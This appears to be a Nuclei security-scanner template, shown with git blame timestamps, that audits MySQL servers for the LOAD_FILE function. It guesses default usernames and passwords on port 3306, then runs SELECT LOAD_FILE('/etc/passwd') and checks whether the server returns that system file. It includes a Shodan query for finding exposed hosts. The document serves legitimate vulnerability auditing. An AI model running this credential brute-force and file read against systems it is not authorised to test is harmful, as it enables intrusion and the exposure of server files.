nuclei-templates/javascript/audit/mysql/mysql-load-file.yaml

58 lines
1.6 KiB
YAML
Raw Normal View History

id: mysql-load-file
info:
name: MySQL LOAD_FILE - Enable
author: pussycat0x
severity: high
description: |
The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.
reference:
- https://nmap.org/nsedoc/scripts/mysql-databases.html
metadata:
verified: true
max-request: 16
shodan-query: "port:3306"
2024-03-22 10:10:06 +00:00
tags: js,mysql,network,audit
javascript:
- code: |
let m = require('nuclei/mysql');
let c = m.MySQLClient();
let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
2024-03-09 18:32:19 +00:00
Export(response);
args:
Host: "{{Host}}"
Port: "3306"
Query: SELECT LOAD_FILE('/etc/passwd')
User: "{{usernames}}"
Pass: "{{passwords}}"
payloads:
2024-03-22 10:10:06 +00:00
usernames:
- root
- admin
- mysql
2024-03-22 14:11:12 +00:00
- test
2024-03-22 10:10:06 +00:00
passwords:
- root
- admin
2024-03-22 14:11:12 +00:00
- mysql
- test
2024-03-22 10:10:06 +00:00
attack: clusterbomb
2024-03-09 18:18:37 +00:00
stop-at-first-match: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- success == true
- type: word
words:
- "root:x:"
extractors:
- type: json
part: response
json:
- .Rows[]
# digest: 4b0a00483046022100907d860204e982df899d9b32c76da23e00fdc18883029567f173190cd5ed7421022100ca703635c58c61a43a8c473060117cb60312849b2a2037b1c48828dd3c350a09:922c64590222798bb761d5b6d8e72950